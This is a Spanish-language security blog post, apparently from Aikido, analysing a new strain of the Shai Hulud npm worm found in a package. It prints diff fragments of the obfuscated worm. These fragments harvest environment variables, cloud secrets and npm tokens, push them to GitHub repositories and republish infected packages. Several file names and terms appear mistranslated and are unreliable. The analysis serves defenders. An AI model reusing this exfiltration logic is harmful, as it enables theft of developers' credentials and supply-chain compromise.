Aikido

Shai Hulud ataca de nuevo - El camino dorado

Charlie EriksenCharlie Eriksen
|
#

Hace 30 minutos, detectamos lo que creemos que es el primer caso de una nueva cepa de Shai Hulud, que se subió a npm en el paquete @vietmoney/react-big-calendar :

https://www.npmjs.com/package/@vietmoney/react-big-calendar

Contiene una nueva y novedosa cepa de Shai Hulud. Por el momento, NO parece haber ninguna propagación ni infección importante. Esto sugiere que es posible que hayamos detectado a los atacantes probando su carga útil. Las diferencias en el código sugieren que se ha vuelto a ofuscar a partir del código fuente original, y no se ha modificado in situ. Esto hace que sea muy improbable que se trate de una copia, sino que haya sido creado por alguien que tenía acceso al código fuente original del gusano.

Aquí documentaremos las novedades.

¿Qué hay de nuevo?

Cometieron un error.

Hemos observado que el autor de la amenaza cometió un error en su código. Cambió los nombres de los archivos, pero cometió un error:

201424,201425c201387,201388
<           let _0x79fc7c = "https://raw.githubusercontent.com/" + _0x44d2dc + '/' + _0x946d5 + "/main/contents.json";
<           let _0x13d2d2 = await fetch(_0x79fc7c, {
---
>           let _0x20e4ac = "https://raw.githubusercontent.com/" + _0x168165 + '/' + _0x6e4ad4 + "/main/c0nt3nts.json";
>           let _0x34b06b = await fetch(_0x20e4ac, {
210001,210009c209956,209968
...
> let _0x443533 = _0x43e355.saveContents("c9nt3nts.json", JSON.stringify(_0x594cb1), "Añadir archivo");
...

Observe que, en el primer caso, intenta recuperar el archivo. contenido.json, pero en realidad guarda el archivo. c9nt3nts.json. ¡Vaya!

Estructura de archivos

Esta nueva cepa de Shai Hulud presenta algunos cambios:

  • El archivo inicial ahora se llama bun_instalador.js
  • La carga útil principal se denomina fuente_medioambiental.js

Nueva descripción del repositorio GitHub

Al filtrar datos a GitHub, ahora se le asigna al repositorio la descripción «Goldox-T3chs: Solo una chica feliz".

201406,201407c201369,201370
<       let _0x49fcc3 = await this.octokit.rest.search.repos({
<         'q': "\"Sha1-Hulud: The Second Coming.\"",
---
>       let _0xa94c36 = await this.octokit.rest.search.repos({
>         'q': "\"Goldox-T3chs: Only Happy Girl.\"",

Nuevos nombres de archivos filtrados

  • 3nvir0nm3nt.json
  • cl0vd.json
  • c9nt3nts.json
  • pigS3cr3ts.json
  • accionesSecretos.json

El interruptor de hombre muerto ha desaparecido.

El interruptor de hombre muerto parece haber desaparecido, lo cual es una buena noticia:

Mejora en el manejo de errores para TruffleHog

Ahora cuenta con una mejor gestión de errores cuando TruffleHog agota el tiempo de espera:

209658,209659c209621,209623
<       let _0x2b320d = setTimeout(() => {
<         _0x51292c.kill();
---
>       let _0x28178f = setTimeout(() => {
>         _0x8a1d5e.kill();
>         _0x15b267(Error("Trufflehog execution timed out after " + this.config.timeout + 'ms'));

Publicación de paquetes dependiente de la versión

En la versión anterior, intentaba llamar a bollo para publicar un paquete que había infectado, lo cual no funciona en Windows. Ahora lo gestiona.

209511,209514c209474,209477
<       }, ['package']);
<       let _0x3b13f2 = "bun";
<       if (a0_0x647ad2.platform() === "win32") {
<         _0x3b13f2 = "bun.exe";
---
>       }, ["package"]);
>       let _0x4a8bac = "bun";
>       if (a0_0x3a4d5e.platform() === 'win32') {
>         _0x4a8bac = "bun.exe";
209516c209479
<       await Bun.$`npm publish ${_0x4fc35c}`.env({
---
>       await Bun.$`${_0x4a8bac} publish ${_0x21c5dd}`.env({

Orden de recogida de secretos

Hay una diferencia sutil, pero importante, en el orden en que se recopilan y guardan los datos, lo que sugiere un cambio intencionado. Observe que en la versión anterior, primero se guardaba el archivo «contents». Ahora se guarda en último lugar.

209986,209990c209945
<   let _0x5bb75d = {
<     'environment': process.env
<   };
<   let _0x6e06c0 = _0x1b7dd4.saveContents("contents.json", JSON.stringify(_0x5735a8), "Add file");
<   let _0x3e4549 = {
---
>   let _0xa50f9e = {
209992c209947
<       'secrets': await _0x30fddc.runSecrets()
---
>       'secrets': await _0x511a7b.runSecrets()
209995c209950
<       'secrets': await _0x79b1b9.listAndRetrieveAllSecrets()
---
>       'secrets': await _0x2efcec.listAndRetrieveAllSecrets()
209998c209953
<       'secrets': await _0x8fa8f.listAndRetrieveAllSecrets()
---
>       'secrets': await _0x390843.listAndRetrieveAllSecrets()
210001,210009c209956,209968
<   let _0x3adc69 = _0x1b7dd4.saveContents("environment.json", JSON.stringify(_0x5bb75d), "Add file");
<   let _0x584734 = _0x1b7dd4.saveContents("cloud.json", JSON.stringify(_0x3e4549), "Add file");
<   let _0xe09164 = await El(_0x4692e0);
<   if (_0x11ccd2 && _0x345f28) {
<     let _0x4012fb = await _0x345f28;
<     if (!_0xe09164.npmTokenValid) {
<       for (let _0x5998e5 of _0x4012fb) if (typeof _0x5998e5 === "object" && _0x5998e5 !== null && !Array.isArray(_0x5998e5)) {
<         for (let [_0x11c4f3, _0x402786] of Object.entries(_0x5998e5)) if (typeof _0x402786 === "string" && _0x402786.startsWith("npm_")) {
<           if (!(await El(_0x402786)).npmTokenValid) {
---
>   let _0x5801a8 = {
>     'environment': process.env
>   };
>   let _0x1c3489 = _0x43e355.saveContents("3nvir0nm3nt.json", JSON.stringify(_0x5801a8), "Add file");
>   let _0x383025 = _0x43e355.saveContents("cl0vd.json", JSON.stringify(_0xa50f9e), "Add file");
>   let _0x443533 = _0x43e355.saveContents("c9nt3nts.json", JSON.stringify(_0x594cb1), "Add file");
>   let _0x5a8131 = await El(_0x587238);
>   if (_0x582c1c && _0x218a2b) {
>     let _0x2eb280 = await _0x218a2b;
>     if (!_0x5a8131.npmTokenValid) {
>       for (let _0x66a856 of _0x2eb280) if (typeof _0x66a856 === "object" && _0x66a856 !== null && !Array.isArray(_0x66a856)) {
>         for (let [_0x8baf81, _0x5cea54] of Object.entries(_0x66a856)) if (typeof _0x5cea54 === 'string' && _0x5cea54.startsWith("npm_")) {
>           if (!(await El(_0x5cea54)).npmTokenValid) {

Esta es una noticia en desarrollo. Manténgase al tanto.

4.7/5

Protege tu software ahora.

Empieza gratis
Sin tarjeta
Solicitar una demo
Sus datos no se compartirán · Acceso de solo lectura · No se requiere tarjeta de crédito

Asegúrate ahora.

Proteja su código, la nube y el entorno de ejecución en un único sistema central.
Encuentre y corrija vulnerabilidades de forma rápida y automática.

No se requiere tarjeta de crédito | Resultados del escaneo en 32 segundos.